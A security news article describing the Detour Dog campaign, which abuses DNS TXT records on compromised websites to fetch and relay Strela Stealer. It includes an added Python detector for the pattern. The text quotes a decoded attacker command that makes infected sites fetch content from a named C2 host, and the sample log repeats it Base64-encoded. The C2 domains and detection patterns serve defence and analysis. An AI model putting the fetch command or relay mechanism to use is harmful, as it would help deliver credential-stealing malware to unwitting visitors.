A sophisticated DNS-based malware campaign has emerged, utilizing thousands of compromised websites worldwide to deliver the Strela Stealer information-stealing malware through an unprecedented technique involving DNS TXT records.
The threat, tracked as Detour Dog by security researchers, represents a significant evolution in malware distribution methods that leverages the Domain Name System as both a command-and-control mechanism and delivery channel.
The malware campaign affects tens of thousands of websites globally, creating a vast network of infected hosts that communicate with actor-controlled name servers through specially crafted DNS queries.
These server-side DNS requests remain invisible to website visitors, allowing the malicious infrastructure to operate covertly while maintaining the appearance of legitimate web traffic.
The infected sites conditionally redirect visitors to malicious content based on their geographic location and device type, creating a sophisticated filtering mechanism that helps evade detection.
Detour Dog has evolved significantly from its origins as a redirect-to-scam operation.
The threat actor behind this campaign has been active since at least August 2023, initially focusing on redirecting users to fraudulent websites and tech support scams.
However, recent developments show a marked shift toward direct malware distribution, particularly in campaigns targeting European users with the Strela Stealer payload.
Infoblox analysts identified the connection between Detour Dog infrastructure and Strela Stealer operations during summer 2025, when they discovered that at least 69 percent of confirmed StarFish staging hosts were under Detour Dog control.
This finding revealed that the threat actor was not merely redirecting traffic but actively participating in multi-stage malware delivery chains that culminated in information theft operations.
Advanced DNS TXT Command and Control Infrastructure
The technical sophistication of Detour Dog’s DNS-based command and control system represents a novel approach to malware communication that exploits the typically overlooked DNS TXT record functionality.
The infected websites generate DNS queries following a structured format that embeds victim information directly into the subdomain structure:
....c2_domain
The system underwent a significant upgrade in spring 2025 when operators added remote code execution capabilities triggered by Base64-encoded responses containing the keyword “down.”
When an infected site receives such a response, it strips the prefix and uses curl to fetch content from specified URLs, effectively turning compromised websites into proxy servers for malware distribution.
The DNS TXT responses follow a specific format that enables complex multi-stage payload delivery.
For example, a decoded response might appear as:
downhttp://updatemsdnserver.com/script.php?u=j6cwaj0h67
This command instructs the infected site to retrieve content from a StarFish C2 server and relay it back to the victim, creating a distributed delivery network that obscures the true source of malicious content.
The system supports both script.php and file.php endpoints, corresponding to different stages of the Strela Stealer delivery process.
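The following is an added illustration of how a defender could flag this pattern in DNS logs; it is not code from the article or from Infoblox. It assumes a simple passive-DNS log format of "<qname> <rtype> <rdata>" per line (an assumption, not the report's data format), uses only the domains and endpoint names the article itself names, and treats the subdomain labels in the constructed sample as placeholders because the page does not reproduce the campaign's victim-encoding scheme. It strictly Base64-decodes TXT answers, looks for the "down" prefix followed by a URL, and notes when the fetch target is one of the script.php or file.php staging endpoints.

```python
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import urlparse

# Domains the report names as Detour Dog / StarFish infrastructure.
KNOWN_C2_DOMAINS = {"webdmonitor.io", "aeroarrows.io", "updatemsdnserver.com"}

# Endpoints the report ties to stages of the Strela Stealer delivery chain.
STAGING_ENDPOINTS = ("script.php", "file.php")

# Prefix that turns a TXT answer into a remote-fetch instruction, per the report.
FETCH_PREFIX = "down"

URL_RE = re.compile(r"^https?://\S+$")


@dataclass
class Finding:
    qname: str
    decoded: Optional[str]
    url: Optional[str] = None
    endpoint: Optional[str] = None
    reasons: List[str] = field(default_factory=list)


def decode_txt(rdata: str) -> Optional[str]:
    """Strictly Base64-decode TXT rdata; None if it is not Base64 or not UTF-8 text."""
    try:
        return base64.b64decode(rdata, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def registrable_domain(qname: str) -> str:
    """Last two labels of the query name. Simplification (assumed): no public-suffix
    handling, which is enough for the .io/.com domains used in this example."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def analyse_txt_record(qname: str, rdata: str) -> Optional[Finding]:
    """Return a Finding when the TXT exchange shows a Detour Dog style pattern, else None."""
    decoded = decode_txt(rdata.strip('"'))
    finding = Finding(qname=qname, decoded=decoded)

    if registrable_domain(qname) in KNOWN_C2_DOMAINS:
        finding.reasons.append("TXT query to a domain named as Detour Dog infrastructure")

    if decoded is not None and decoded.startswith(FETCH_PREFIX):
        candidate = decoded[len(FETCH_PREFIX):]
        if URL_RE.match(candidate):
            finding.url = candidate
            finding.reasons.append("Base64 TXT answer carries a 'down' + URL fetch instruction")
            finding.endpoint = urlparse(candidate).path.rsplit("/", 1)[-1]
            if finding.endpoint in STAGING_ENDPOINTS:
                finding.reasons.append(f"fetch target is a {finding.endpoint} staging endpoint")

    return finding if finding.reasons else None


def scan_log(lines: List[str]) -> List[Finding]:
    """Parse '<qname> <rtype> <rdata>' lines (assumed format) and analyse the TXT ones."""
    findings = []
    for line in lines:
        parts = line.split(maxsplit=2)
        if len(parts) != 3 or parts[1].upper() != "TXT":
            continue
        finding = analyse_txt_record(parts[0], parts[2])
        if finding:
            findings.append(finding)
    return findings


# Constructed sample log. Subdomain labels are placeholders, not the campaign's real
# victim-encoding format. The first answer encodes the decoded command quoted in the report.
SAMPLE_COMMAND = "downhttp://updatemsdnserver.com/script.php?u=j6cwaj0h67"
SAMPLE_LOG = [
    f'a1b2c3.aeroarrows.io TXT "{base64.b64encode(SAMPLE_COMMAND.encode()).decode()}"',
    'example.com TXT "v=spf1 include:_spf.example.com ~all"',   # ordinary SPF record
    'status.example.org TXT "aGVsbG8gd29ybGQ="',                 # Base64 but harmless text
    'x9y8z7.webdmonitor.io TXT "bm9vcA=="',                       # known domain, no command
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f.qname, "->", f.url or "(no fetch command)", ";", "; ".join(f.reasons))
```

Run stand-alone it reports two of the four records: the aeroarrows.io query, whose answer decodes to the script.php fetch instruction, and the webdmonitor.io query, flagged on the domain alone. Strict Base64 validation is what keeps ordinary SPF and DKIM records out of the decode path, and decoding before matching on "down" matters because the raw rdata never contains that keyword.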
The threat actor has demonstrated remarkable resilience in maintaining their infrastructure. When the Shadowserver Foundation sinkholed the webdmonitor.io domain in August 2025, Detour Dog operators established a replacement C2 server within hours, seamlessly transferring control of their infected website network to the new aeroarrows.io domain.
Analysis of sinkhole data revealed approximately 30,000 unique domains spanning 584 distinct top-level domains, all generating properly formatted DNS TXT queries to the actor-controlled infrastructure.
The scale and persistence of this operation highlight the effectiveness of DNS as a covert communication channel for malware operations.
The distributed nature of the infected website network, combined with the legitimate appearance of DNS traffic, creates significant challenges for traditional security monitoring systems that may not scrutinize TXT record communications with the same intensity applied to other network protocols.
This represents a significant advancement in malware distribution techniques, where DNS infrastructure serves dual purposes as both a command channel and a content delivery mechanism, creating a resilient and difficult-to-detect threat ecosystem.